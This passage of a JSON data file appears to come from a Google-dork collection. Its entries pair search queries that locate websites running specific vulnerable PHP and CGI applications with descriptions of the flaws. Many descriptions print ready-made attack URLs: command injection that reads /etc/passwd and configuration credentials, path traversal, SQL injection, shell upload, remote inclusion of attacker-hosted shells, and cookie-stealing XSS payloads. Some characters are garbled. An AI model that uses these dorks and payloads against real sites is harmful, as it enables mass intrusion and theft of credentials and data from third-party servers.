prone to an arbitrary PHP script code execution vulnerability. The issue is reported to exist due to a lack of sufficient input sanitization performed on user-supplied data before this data is included in a dynamically generated scripthttp://www.securityfocus.com/bid/12622/info/"}, {"dork": "filetype:php intitle:\"paNews v2.0b4\"", "description": "PaNews is reported prone to a remote PHP script code execution vulnerability. It is reported that PHP script code may be injected into the PaNews software through the 'showcopy' parameter of the 'admin_setup.php' script. http://www.securityfocus.com/bid/12611"}, {"dork": "\"Powered by Coppermine Photo Gallery\" ( \"v1.2.2 b\" | \"v1.2.1\" | \"v1.2\" | \"v1.1\" | \"v1.0\")", "description": "Reportedly Coppermine Photo Gallery is prone to multiple input validation vulnerabilities, some of which may lead to arbitrary command execution. These issues are due to the application failing to properly sanitize and validate user-supplied input prior to using it in dynamic content and system command execution function calls.These issues may be exploited to steal cookie based authentication credentials, map the application root directory of the affected application, execute arbitrary commands and include arbitrary files. Other attacks are also possible.http://www.securityfocus.com/bid/10253/"}, {"dork": "intext:\"Powered by phpBB 2.0.13\" inurl:\"cal_view_month.php\"|inurl:\"downloads.php\"", "description": "phpBB 2.0.13 with installed Calendar Pro MOD are vulnerable to SQL injection attacks. An attacker can download the MD5 hashes from the account databse without authorization."}, {"dork": "intitle:\"osTicket :: Support Ticket System\"", "description": "osTicket is a widely-used open source support ticket system. It is a lightweight support ticket tool written mainly using PHP scripting language. There are several vulnerabilities in the osTicket software that may allow for an attacker to take control of the affected web server, disclose sensitive data from the database, or read arbitrary files. These issues have been reported to the developers and a new updated version of osTicket is available for download. All affected users should upgrade their osTicket installations immediately.http://www.addict3d.org/index.php?page=viewarticle&type=security&ID=3882"}, {"dork": "inurl:sphpblog intext:\"Powered by Simple PHP Blog 0.4.0\"", "description": "simple PHP Blog is vulnerable to mutiple attacks:Vulnerabilities:~~~~~~~~~~~~~~~~A. Full Path disclosuresB. XSS in search.phpC. Critical Information dislosures http://www.securityfocus.com/archive/1/395994"}, {"dork": "intitle:\"PowerDownload\" (\"PowerDownload v3.0.2 \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9\" | \"PowerDownload v3.0.3 \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9\" ) -site:powerscripts.org", "description": "The PowerDownload program (version 3.0.2 and 3.0.3) contains a serious vulnerability. Vulnerability discovery: SoulBlack - Security Research (http://soulblack.com.ar)Date: 05/31/2005Severity: High. Remote Users Can Execute Arbitrary Code.Affected version: v3.0.2 & v3.0.3vendor: http://www.powerscripts.org/* Fix *Contact the Vendor* References *http://www.soulblack.com.ar/repo/papers/advisory/powerdownload_advisory.txt"}, {"dork": "\"portailphp v1.3\" inurl:\"index.php?affiche\" inurl:\"PortailPHP\" -site:safari-msi.com", "description": "Vulnerability has been found in parameter \"id\". If this variableAny value it is possible to replace it with a sign ' is transferredSince this parameter is involved in all modules, all of themAre vulnerable.It occurs because of absence of a filtration of parameter id.Exampleshttp://example/index.php?affiche=News&id='[SQL inj]http://example/index.php?affiche=File&id='[SQL inj]http://example/index.php?affiche=Liens&id='[SQL inj]http://example/index.php?affiche=Faq&id='[SQL inj]The conclusionVulnerability is found out in version 1.3, on other versionsDid not check. Probably they too are vulnerable."}, {"dork": "intext:\"Powered by flatnuke-2.5.3\" +\"Get RSS News\" -demo", "description": "Description of VulnerabilitiesMultiple vulnerabilities in FlatNuke have been reported, which can be exploited by remote users to trigger denial of service conditions, execute arbitrary PHP code, conduct Cross-Site Scripting attacks and disclose arbitrary images and system information.If the \"/flatnuke/foot_news.php\" script is accessed directly a while() call is made that enters an infinite loop, leading to full CPU utilisation.[..]User-supplied input passed to the \"image\" parameter in the \"thumb.php\" script is not correctly validated. This can be exploited to disclose arbitrary images from external and local resources via directory traversal attacks, or to disclose the installation path.It is also possible to disclose the system path by accessing certain scripts directly or specially formed parameters."}, {"dork": "intext:\"Powered By: Snitz Forums 2000 Version 3.4.00..03\"", "description": "snitz Forum 2000 v 3.4.03 and older is vulnerable to many things including XSS. See http://www.gulftech.org/?node=research&article_id=00012-06162003. This is a sketchy search, finding vulnerable versions 3.4.00-3.4.03. Older versions are vulnerable as well."}, {"dork": "inurl:\"/login.asp?folder=\" \"Powered by: i-Gallery 3.3\"", "description": "i-Gallery 3.3 (and possibly older) is vulnerable to many things, including /../ traversals.http://www.packetstormsecurity.org/0506-exploits/igallery33.txt"}, {"dork": "intext:\"Calendar Program \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 Copyright 1999 Matt Kruse\" \"Add an event\"", "description": "This search finds all pages that allow you to add events in Mark Kruse's CalendarScript. This script seems to be VERY vulnerable to HTML injection techniques."}, {"dork": "\"powered by PhpBB 2.0.15\" -site:phpbb.com", "description": "Another php vulnerabilty, as seen here http://www.frsirt.com/exploits/20050704.phpbbSecureD.pl.phpphpBB 2.0.15 Viewtopic.PHP Remote Code Execution VulnerabilityThis exploit gives the user all the details about the databaseconnection such as database host, username, password anddatabase name."}, {"dork": "inurl:index.php fees shop link.codes merchantAccount", "description": "Vulnerability in EPay systemsPHP code includinghttp://targeturl/index.php?read=../../../../../../../../../../../../../../etc/passwdadvisory:http://www.cyberlords.net/advisories/cl_epay.txtEPay Pro version 2.0 is vulnerable to this issue."}, {"dork": "intitle:\"blog torrent upload\"", "description": "Blog Torrent is free, open-source software that provides a way to share large files on your website.vulnerability: free access to the password filehttp://[target]/[path_of_blog]/data/newusersadvisory:http://www.securitytracker.com/alerts/2005/Jul/1014449.htmlAll current versions could be vulnerable depending on directory permissions."}, {"dork": "\"Powered by Zorum 3.5\"", "description": "Zorum 3.5 remote code execution poc exploitsoftware:description: Zorum is a freely available, open source Web-based forumapplication implemented in PHP. It is available for UNIX, Linux, and any otherplatform that supports PHP script execution.author site: http://zorum.phpoutsourcing.com/1) remote code execution:vulnerable code, in /gorum/prod.php file:07 $doubleApp = isset($argv[1]); ...14 if( $doubleApp )15 {16 $appDir = $argv[1];17 system(\"mkdir $prodDir/$appDir\"); ...a user can execute arbitrary commands using pipe char, example:http://[target]/zorum/gorum/prod.php?argv[1]=|ls%20-lato list directorieshttp://[target]/zorum/gorum/prod.php?argv[1]=|cat%20../config.phpto see database username/password...http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20/etc/passwdto see /etc/passwd file2) path disclosure:http://[target]/zorum/gorum/notification.phphttp://[target]/zorum/user.phphttp://[target]/zorum/attach.phphttp://[target]/zorum/blacklist.phphttp://[target]/zorum/forum.phphttp://[target]/zorum/globalstat.phphttp://[target]/zorum/gorum/trace.phphttp://[target]/zorum/gorum/badwords.phphttp://[target]/zorum/gorum/flood.phpand so on...googledork:\"Powered by Zorum 3.5\"rgodsite: http://rgod.altervista.orgmail: retrogod at aliceposta itoriginal advisory: http://rgod.altervista.org/zorum.html"}, {"dork": "\"Powered by FUDForum 2.6\" -site:fudforum.org -johnny.ihackstuff", "description": "FUDforum is prone to a remote arbitrary PHP file upload vulnerability.An attacker can merge an image file with a script file and upload it to an affected server.This issue can facilitate unauthorized remote access.FUDforum versions prior to 2.7.1 are reported to be affected. Currently Symantec cannot confirm if version 2.7.1 is affected as well.Affected versions:2.6.15 _ 2.6.14 _ 2.6.132.6.12 _ 2.6.10 _ 2.6.9 _ 2.6.82.6.7 _ 2.6.5 _ 2.6.4 _ 2.6.32.6.2 _ 2.6.1 _ 2.6"}, {"dork": "intitle:\"Looking Glass v20040427\" \"When verifying", "description": "Looking Glass v20040427 arbitrary commands execution / cross site scripting. description: Looking Glass is a pretty extensive web based network querying tool for use on php enabled servers. site: http://de-neef.net/articles.php?id=2&page=1download page: http://de-neef.net/download.php?file=2Read the full report here: http://rgod.altervista.org/lookingglass.html"}, {"dork": "\"powered by ITWorking\"", "description": "saveWebPortal 3.4 remote code execution / admin check bypass / remote fileinclusion / cross site scripting author site: http://www.circeos.itdownload page: http://www.circeos.it/frontend/index.php?page=downloadsa) remote code execution:a user can bypass admin check, calling this url:http://[target]/saveweb/admin/PhpMyExplorer/editerfichier.php?chemin=.&fichier=header.php&type=Sourcenow can leave a backdoor in header.php or some other file, example:after editing template, user can execute arbitrary system commands, through aurl like this:http://[target]/saveweb/header.php?command=ls%20-lato list directories...http://[target]/saveweb/header.php?command=cat%20config.inc.phpto see database username/password and admin panel username/password (now attacker have full access to site configuration... can go tohttp://[target]/saveweb/admin/to login...)http://[target]/saveweb/header.php?command=cat%20/etc/passwdto see passwd file...b) arbitrary file inclusion:a user can view any file on the target server,if not with .php extension:http://[target]/saveweb/menu_dx.php?SITE_Path=../../../../../boot.ini%00http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../boot.ini%00can execute arbitrary file resident on target server, if with .php extension,example :http://[target]/saveweb/menu_dx.php?SITE_Path=../../../../../[script].php%00http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../[script].php%00can craft a malicious url to cause victim user to execute commands on externalsite:http://[target]/saveweb/menu_dx.php?SITE_Path=http://[external_site]/cmd.gif%00http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=http://[external_site]/cmd.gif%00where cmd.gif is a file like this:c) xss:c.1)http://[target]/saveweb/footer.php?TABLE_Width=>alert(document.cookie)http://[target]/saveweb/footer.php?SITE_Author_Domain=>alert(document.cookie)http://[target]/saveweb/footer.php?SITE_Author=>alert(document.cookie)http://[target]/saveweb/footer.php?L_Info=>alert(document.cookie)http://[target]/saveweb/footer.php?L_Help=>alert(document.cookie)http://[target]/saveweb/header.php?TABLE_Width=>alert(document.cookie)http://[target]/saveweb/header.php?L_Visitors=>alert(document.cookie)http://[target]/saveweb/header.php?count=>alert(document.cookie)http://[target]/saveweb/header.php?SITE_Logo=\">alert(document.cookie)http://[target]/saveweb/header.php?BANNER_Url=\">alert(document.cookie)http://[target]/saveweb/header.php?L_Sunday=\"}alert(document.cookie)"}, {"dork": "intitle:guestbook inurl:guestbook \"powered by Adva", "description": "Advanced Guestbook is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible."}, {"dork": "\"Powered by FUDForum 2.7\" -site:fudforum.org -johnny.ihackstuff", "description": "FUDforum is prone to a remote arbitrary PHP file upload vulnerability.An attacker can merge an image file with a script file and upload it to an affected server.This issue can facilitate unauthorized remote access.FUDforum versions prior to 2.7.1 are reported to be affected. Currently Symantec cannot confirm if version 2.7.1 is affected as well.Affected versions:2.7"}, {"dork": "\"Calendar programming by AppIdeas.com\" filetype:php", "description": "phpCommunityCalendar 4.0.3 (possibly prior versions) sql injection / login bypass / cross site scripting This search does not narrow to vulnerable versions.software:site: http://open.appideas.comdownload: http://open.appideas.com/Calendar/original advisory: http://rgod.altervista.org/phpccal.html"}, {"dork": "\"Powered by MD-Pro\" | \"made with MD-Pro\"", "description": "MAXdev MD-Pro 1.0.73 (possibly prior versions) remote code execution/ cross site scripting / path disclosure. This search does not find vulnerable versions.software:site: http://www.maxdev.com/description: http://www.maxdev.com/AboutMD.phtmloriginal advisory: http://rgod.altervista.org/maxdev1073.html"}, {"dork": "\"Software PBLang\" 4.65 filetype:php", "description": "my advisory:[quote]PBLang 4.65 (possibly prior versions) remote code execution / administrativecredentials disclosure / system information disclosure / cross site scripting /path disclosuresoftware:description: PBLang is a powerful flatfile Bulletin Board System. It combinesmany features of a professional board, but does not even require SQL support. Itis completely based on text-file.site: http://pblang.drmartinus.de/download: https://sourceforge.net/project/showfiles.php?group_id=629531) system disclosure:you can traverse directories and see any file (if not .php or .php3 etc.) andinclude any file on target system using '../' chars and null byte (%00), example:http://target]/[path]/pblang/setcookie.php?u=../../../../../etc/passwd%00vulnerable code in setcookie.php: ...16 $usrname=$HTTP_GET_VARS['u'];17 @include($dbpath.'/'.$usrname.'temp'); ...2) remote code execution:board stores data in files, when you register a [username] file without extensionis created in /db/members directory, inside we have php code executed when youlogin, so in location field type:madrid\"; system($HTTP_POST_VARS[cmd]); echo \"in /db/members/[username] file we have...$userlocation=\"madrid\"; system($HTTP_GET_VARS[cmd]); echo \"\";...no way to access the script directly, /db/members is .htaccess protectedand extra lines are deleted from files after you login, so you should makeall in a POST request and re-registerthis is my proof of concept exploit, to include [username] file I make a GET request of setcookie.php?u=[username]%00&cmd=[command] but you can call username file through some other inclusion surely when you surf the forum:http://rgod.altervista.org/pblang465.html 3)admin/user credentials disclosure:you can see password hash of any user or admin sending the command:cat ./db/members/[username]4) cross site scripting:register and in location field type:madrid\"; echo \"alert(document.cookie)then check this url:http://[target]/[path]/setcookie.php?u=[username]%005) path disclosure:http://[target]/[path]/setcookie.php?u=%00googledork: \"Software PBLang\" filetype:phprgodsite: http://rgod.altervista.orgmail: retrogod@aliceposta.itoriginal advisory: http://rgod.altervista.org/pblang465.html[/quote]"}, {"dork": "\"Powered by and copyright class-1\" 0.24.4", "description": "class-1 Forum Software v 0.24.4 Remote code executionsoftware: site: http://www.class1web.co.uk/softwaredescription: class-1 Forum Software is a PHP/MySQL driven web forum. It is written and distributedunder the GNU General Public License which means that its source is freely-distributedand available to the general public. vulnerability: the way the forum checks attachment extensions...look at the vulnerable code at viewforum.php 256-272 lines.nothing seems so strange, but... what happen if you try to upload a filewith this name? :shell.php.' or 'a' ='a;)[1] SQL INJECTION!The query and other queries like this become:SELECT * FROM [extensions table name] WHERE extension='' or 'a' ='a' AND file_type='Image'you have bypassed the check... now an executable file is uploaded, because for Apache, bothon Windows and Linux a file with that name is an executable php file...you can download a poc file from my site, at url:http://rgod.altervista.org/shell.zipinside we have:you can do test manually, unzip the file, register, login, post this file as attachment, thengo to this url to see the directory where the attachment has been uploaded:http://[target]/[path]/viewattach.phpyou will be redirected to:http://[target]/[path]/[upload_dir]/then launch commands:http://[target]/[path]/[upload_dir]/shell.php.'%20or%20'a'%20='a?command=cat%20/etc/passwdto see /etc/passwd filehttp://[target]/[path]/[upload_dir]/shell.php.'%20or%20'a'%20='a?command=cat%20./../db_config.incto see database username and passwordand so on...you can see my poc exploit at this url:http://www.rgod.altervista.org/class1.htmlgoogledork: \"Powered by and copyright class-1\"rgodsite: http://rgod.altervista.orgmail: retrogod [at] aliceposta . it"}, {"dork": "\"Powered by AzDg\" (2.1.3 | 2.1.2 | 2.1.1)", "description": "AzDGDatingLite V 2.1.3 (possibly prior versions) remote code execution software: site: http://www.azdg.com/ download page: http://www.azdg.com/scripts.php?l=english description:\" AzDGDatingLite is a Free dating script working on PHP and MySQL. Multilanguage, Multitemplate, quick/simple search, feedback with webmaster, Admin maillist, Very customizable \" etc. vulnerability: look at the vulnerable code in ./include/security.inc.php at lines ~80-90 ... else { if (isset($l) && file_exists(C_PATH.'/languages/'.$l.'/'.$l.'.php') && $l != '') { include_once C_PATH.'/languages/'.$l.'/'.$l.'.php'; include_once C_PATH.'/languages/'.$l.'/'.$l.'_.php'; } ... you can include arbitrary file on the server using \"../\" and null byte (%00) (to truncate path to the filename you choose), example: http://[target]/[path]/azdg//include/security.inc.php?l=../../../../../../../[filename.ext]%00 at the begin of the script we have: @ob_start(); look at the php ob_ start man page : \"This function will turn output buffering on. While output buffering is active no output is sent from the script (other than headers), instead the output is stored in an internal buffer.\" However, this is not a secure way to protect a script: buffer is never showned, so you cannot see arbitrary file from the target machine this time ... but you can execute arbirtrary commands and after to see any file :) : when you register to azdg you can upload photos, so you can upload and include a gif or jpeg file like this: usually photos are uploaded to ./members/uploads/[subdir]/[newfilename].[ext] azdg calculates [subdir] & [newfilename] using date(), time() and rand() functions you cannot calculate but you can retrieve the filename from azdg pages when file is showned on screen (!), so you can do this: http://[target]/[path]/azdg//include/security.inc.php?l=../../../members/uploads/[subdir]/[filename.ext]%00&cmd=cat%20/etc/passwd the output will be redirected to ./include/temp.txt so you make a GET request of this file and you have /etc/passwd file you can find my poc exploit at this url:http://rgod.altervista.org/azdg.html"}, {"dork": "\"Powered by: Land Down Under 800\" | \"Powered by: Land Down Under 801\" - www.neocrome.net", "description": "Land Down Under is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.http://secunia.com/advisories/16878/"}, {"dork": "\"Copyright 2004 \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 Digital Scribe v.1.4\"", "description": "Digital Scribe v1.4 Login Bypass / SQL injection / remote code executionsoftware site: http://www.digital-scribe.org/description: \"Teachers have full control through a web-based interface. Designedfor easy installation and even easier use, the Digital Scribe has been used in thousands of schools. No teacher or IT Personnel needs to know any computer languages in order to install and use this intuitive system.rgodsite: http://rgod.altervista.orgemail: retrogod at aliceposta it"}, {"dork": "\"Powered by PHP Advanced Transfer Manager v1.30\"", "description": "PHP Advanced Transfer Manager v1.30 underlying system disclosure / remote command execution / cross site scriptingrgodsite: http://rgod.altervista.orgmail: retrogod at aliceposta it"}, {"dork": "\"Powered by CuteNews\"", "description": "CuteNews 1.4.0 (possibly prior versions) remote code executionsoftware site: http://cutephp.com/description: \"Cute news is a powerful and easy for using news management system that use flat files to store its database. It supports comments, archives, search function, image uploading, backup function, IP banning, flood protection ...\"rgodsite: http://rgod.altervista.orgmail: retrogod [at] aliceposta it"}, {"dork": "\"Mimicboard2 086\"+\"2000 Nobutaka Makino\"+\"password\"+\"message\" inurl:page=1", "description": "Mimicboard2 is prone to multiple HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content."}, {"dork": "\"Maintained with Subscribe Me 2.044.09p\"+\"Professional\" inurl:\"s.pl\"", "description": "subscribe Me Pro 2.0.44.09p is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input. Exploitation of this vulnerability could lead to a loss of confidentiality as arbitrary files are disclosed to an attacker. Information obtained through this attack may aid in further attacks against the underlying system.http://www.securityfocus.com/bid/14817/exploit"}, {"dork": "\"Powered by autolinks pro 2.1\" inurl:register.php", "description": "AutoLinksPro is a linking solution. AutoLinksPro link exchange software was built for the search engines to help improve your search engine rankings, traffic, and sales.Remote PHP File Include Vulnerabilityhttp://www.securityfocus.com/archive/1/409529/30/120/threaded"}, {"dork": "intitle:\"PHP TopSites FREE Remote Admin\"", "description": "PHP TopSites is a PHP/MySQL-based customizable TopList script. Main features include: Easy configuration config file; MySQL database backend; unlimited categories, Site rating on incoming votes; Special Rating from Webmaster; anti-cheating gateway; Random link; Lost password function; Webmaster Site-approval; Edit site; ProcessingTime display; Cookies Anti-Cheating; Site Reviews; Linux Cron Free; Frame Protection and much more.PHP TopSites Discloses Configuration Data to Remote Users:http://www.securitytracker.com/alerts/2005/Jul/1014552.htmlPS: all versions are vulnerable at time of writing."}, {"dork": "Powered by PHP-Fusion v6.00.109 \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 2003-2005. -php-fusion.co.uk", "description": "this is the dork: Powered by PHP-Fusion v6.00.109 \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 2003-2005. -php-fusion.co.ukas it is, without quotes, for the version I tested, prone toSQL Injection / administrative credentials disclosurethis my advisory/poc exploit: http://rgod.altervista.org/phpfusion600109.html"}, {"dork": "\"Powered By: lucidCMS 1.0.11\"", "description": "Lucid CMS 1.0.11 SQL Injection /Login bypassthis is the dork for ther version I tested:\"Powered By: lucidCMS 1.0.11\"advisory/poc exploit:http://rgod.altervista.org/lucidcms1011.htmlwe have an XSS even:http://packetstorm.linuxsecurity.com/0509-exploits/lucidCMS.txt"}, {"dork": "\"News generated by Utopia News Pro\" | \"Powered By: Utopia News Pro\"", "description": "Utopia News Pro 1.1.3 (and prior versions) SQL Injection & XSSadvisory & poc exploit:http://rgod.altervista.org/utopia113.html"}, {"dork": "intitle:Mantis \"Welcome to the bugtracker\" \"0.15 | 0.16 | 0.17 | 0.18\"", "description": "cross site scripting and sql injection vunerabilities were discovered in Mantis versions 0.19.2 or less. Mantis is a web-based bugtracking system written in PHP. Vunerability report athttp://search.securityfocus.com/archive/1/411591/30/0/threaded"}, {"dork": "\"Cyphor (Release:\" -www.cynox.ch", "description": "Cyphor 0.19 (possibly prior versions) SQL Injection / Board takeover / cross site scriptingmy advisory & poc exploit:http://rgod.altervista.org/cyphor019.htmlrgodModerator PS: The software is longer maintained."}, {"dork": "\"Welcome to the versatileBulletinBoard\" | \"Powered by versatileBulletinBoard\"", "description": "versatileBulletinBoard V1.0.0 RC2 (possibly prior versions)multiple SQL Injection vulnerabilities / login bypass / cross site scripting / information disclosureadvisory:http://rgod.altervista.org/versatile100RC2.html"}, {"dork": "inurl:\"wfdownloads/viewcat.php?list=\"", "description": "XOOPS WF_Downloads (2.05) module SQL injectionThis a specific dork, that searches XOOPS sites with WF_Downloads module installed, advisory & poc exploit:http://rgod.altervista.org/xoops_xpl.html"}, {"dork": "\"powered by GuppY v4\"|\"Site cr\u00c3\u0192\u00c6\u2019\u00c3\u201a\u00c2\u00a9\u00c3\u0192\u00c6\u2019\u00c3\u201a\u00c2\u00a9 avec GuppY v4\"", "description": "Guppy remote code execution / various arbitrary inclusion issuesadvisory & poc exploit:http://rgod.altervista.org/guppy459_xpl.html"}, {"dork": "\"2005 SugarCRM Inc. All Rights Reserved\" \"Powered By SugarCRM\"", "description": "this is the dork for Sugar Suite 3.5.2a & 4.0beta remote code execution issue, advisory & poc exploit:http://rgod.altervista.org/sugar_suite_40beta.html"}, {"dork": "\"Powered By phpCOIN 1.2.2\"", "description": "PhpCOIN 1.2.2 arbitrary remote\\local inclusion / blind sql injection / path disclosureadvisory:http://rgod.altervista.org/phpcoin122.htmlmore generic:\"Powered By phpCOIN\"to see previous verions (not tested)"}, {"dork": "intext:\"Powered by SimpleBBS v1.1\"*", "description": "Vulnerability DescriptionSimpleBBS contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the search module not properly sanitizing user-supplied input to undisclosed variables. This may allow an attacker to inject or manipulate SQL queries in the backend database. No further details have been provided.Solution DescriptionCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.Products:* SimpleMedia SimpleBBS 1.1 AffectedVulnerability classification:* Remote vulnerability* Input manipulation attack* Impact on integrity* Exploit unavailable* VerifiedMore info on Vuln: http://www.securityfocus.com/bid/15594"}, {"dork": "(intitle:\"metaframe XP Login\")|(intitle:\"metaframe Presentation server Login\")", "description": "Once you input any username, you'll get an error message. Try putting a script with some other fun commands in it. Just send some info off to be logged.If exploited correctly, could give you admin access to a network."}, {"dork": "\"index of\" intext:fckeditor inurl:fckeditor", "description": "\"index of\" intext:fckeditor inurl:fckeditor this dork is for FCKEditor scriptthrough editor/filemanager/browser/default/connectors/connector.php script a user can upload malicious contempt on target machine including php code and launch commands... however if you do not succeed to execute the shell, FCKEditor is integrated in a lot of applications, you can check for a local inclusion issue inside of them... this tool make the dirty work for 2.0 - 2.2 versions: http://retrogod.altervista.org/fckeditor_22_xpl.html"}, {"dork": "(\"powered by nocc\" intitle:\"NOCC Webmail\") -site:sourceforge.net -Zoekinalles.nl -analysis", "description": "dork: (\"powered by nocc\" intitle:\"NOCC Webmail\") -site:sourceforge.net -Zoekinalles.nl -analysis software: http://nocc.sourceforge.net/ this is for Nocc Webmail multiple arbitrary local inclusion, multiple xss & possible remote code execution flaws I found: example of arbitrary local inclusion: http://[target]/[path]/html/footer.php?cmd=dir&_SESSION[nocc_theme]=../../../../../../../../../test.php%00 http://[target]/[path]/html/footer.php?_SESSION[nocc_theme]=../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/index.php?lang=fr&theme=../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/index.php?lang=../../../../../../../../../../../../test example of commands execution (including an uploaded mail attachment with php code inside, filename is predictable...) http://[target]/[path]/index.php?cmd=dir&lang=../tmp/php331.tmp1140514888.att%00 xss: http://[target]/[path]/html/error.php?html_error_occurred=alert(document.cookie) http://[target]/[path]/html/filter_prefs.php?html_filter_select=alert(document.cookie) http://[target]/[path]/html/no_mail.php?html_no_mail=alert(document.cookie) http://[target]/[path]/html/html_bottom_table.php?page_line=alert(document.cookie) http://[target]/[path]/html/html_bottom_table.php?prev=alert(document.cookie) http://[target]/[path]/html/html_bottom_table.php?next=alert(document.cookie) http://[target]/[path]/html/footer.php?_SESSION[nocc_theme]=\">alert(document.cookie) full advisory & poc exploit: http://retrogod.altervista.org/noccw_10_incl_xpl.html"}, {"dork": "intitle:\"igenus webmail login\"", "description": "intitle:\"igenus webmail login\"example exploit: http://[target]/[path]/?Lang=../../../../../../../../../../etc/passwd%00 http://[target]/[path]/config/config_inc.php?SG_HOME=../../../../../../../../../../etc/passwd%00 also, on php5: http://[target]/[path]/config/config_inc.php?SG_HOME=ftp://username:password@somehost.com&cmd=dir where on somehost.com you have a php shell code in a \".config\" file exploit code: http://retrogod.altervista.org/igenus_202_xpl_pl.html"}, {"dork": "intext:\"Powered By Geeklog\" -geeklog.net", "description": "dork: intext:\"Powered By Geeklog\" -geeklog.net this is for the vulnerability discovered by GulfTech research, related stuff: (*) http://www.gulftech.org/?node=research&article_id=00102-02192006 http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=geeklog&type=archives&%5Bsearch%5D.x=0&%5Bsearch%5D.y=0 exploit for (*) : http://retrogod.altervista.org/geeklog_1_4_xpl_php_.html (php) http://retrogod.altervista.org/geeklog_1_4_xpl_perl_.html (perl...mphhh)"}, {"dork": "intitle:admbook intitle:version filetype:php", "description": "intitle:admbook intitle:version filetype:php tested version: 1.2.2, you can inject php code in config-data.php and execute commands on target through X-FOWARDED FOR http header when you post a message also you can see phpinfo(): http://[target]/[path]/admin/info.phpperl exploit:http://retrogod.altervista.org/admbook_122_xpl.html"}, {"dork": "WEBalbum 2004-2006 duda -ihackstuff -exploit", "description": "dork: WEBalbum 2004-2006 duda -ihackstuff -exploitsoftware site: http://www.web-album.org/ advisory/ poc exploit: http://retrogod.altervista.org/webalbum_202pl_local_xpl.html"}, {"dork": "inurl:*.exe ext:exe inurl:/*cgi*/", "description": "a cgi-bin executables xss/html injection miscellanea:some examples:inurl:keycgi.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/keycgi.exe?cmd=download&product=\">[XSS HERE] inurl:wa.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/wa.exe?SUBED1=\">[XSS HERE] inurl:mqinterconnect.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/mqinterconnect.exe?poi1iconid=11111&poi1streetaddress=\">[XSS HERE]&poi1city=city&poi1state=OK inurl:as_web.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/as_web.exe?[XSS HERE]+B+wishes inurl:webplus.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/webplus.exe?script=\">[XSS HERE] inurl:odb-get.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/odb-get.exe?WIT_template=\">[XSS HERE]&WIT_oid=what::what::1111&m=1&d= inurl:hcapstat.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/hcapstat.exe?CID=\">[XSS HERE]&GID=&START=110&SBN=OFF&ACTION=Submit inurl:webstat.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/webstat.exe?A=X&RE=\">[XSS HERE] inurl:cows.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/cows/cows.exe?cgi_action=tblBody&sort_by=\">[XSS HERE] inurl:findifile.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/findfile.exe?SEEKER=\">[XSS HERE]&LIMIT=50&YEAR=\"> inurl:baserun.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/baserun.exe?_cfg=\">[XSS HERE] inurl:Users.exe ext:exe inurl:/*cgi*/ html injection: http://[target]/[path]/cgi-bin/Users.exe?SITEID=[html]"}, {"dork": "inurl:server.php ext:php intext:\"No SQL\" -Released", "description": "vulnerabilitydiscovered by Secunia, quick reference:http://www.securityfocus.com/bid/16187an example of exploit for PHPOpenChat:http://retrogod.altervista.org/phpopenchat_30x_sql_xpl.htmla DOS exploit:http://retrogod.altervista.org/adodb_dos.html"}, {"dork": "intitle:PHPOpenChat inurl:\"index.php?language=\"", "description": "exploit:http://retrogod.altervista.org/phpopenchat_30x_sql_xpl.htmlalso, information disclosure:http://[target]/[path]/include/adodb/tests/tmssql.php?do=phpinfoand denial of service on some windows system, multiple requests of:http://[target]/[path]/include/adodb/tests/tmssql.php?do=closelog"}, {"dork": "inurl:\"extras/update.php\" intext:mysql.php -display", "description": "this is an osCommerce dork:inurl:\"extras/update.php\" intext:mysql.php -display or more simply: inurl:\"extras/update.php\" -display (this display some more hosts where error_reporting=0) I found this simple exploit, if extras/ folder is inside the www path, you can view all files on target system, including php files and so on, ex: http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php http://[target]/[path]/extras/update.php?read_me=0&readme_file=../index.php http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/fstab also, if you succeed to view configure script with database details, you can connect to it trough some test scripts inside this folder...now I read this:http://www.securityfocus.com/bid/14294/infothis is actually unpatched/unresolved in 2.2 on Apr 2006"}, {"dork": "inurl:sysinfo.cgi ext:cgi", "description": "dork:inurl:sysinfo.cgi ext:cgi exploit: http://www.milw0rm.com/exploits/1677 I found this command execution vulnerability in 1.2.1 but other versions maybe vulnerable toohowever, u can see version in google results"}, {"dork": 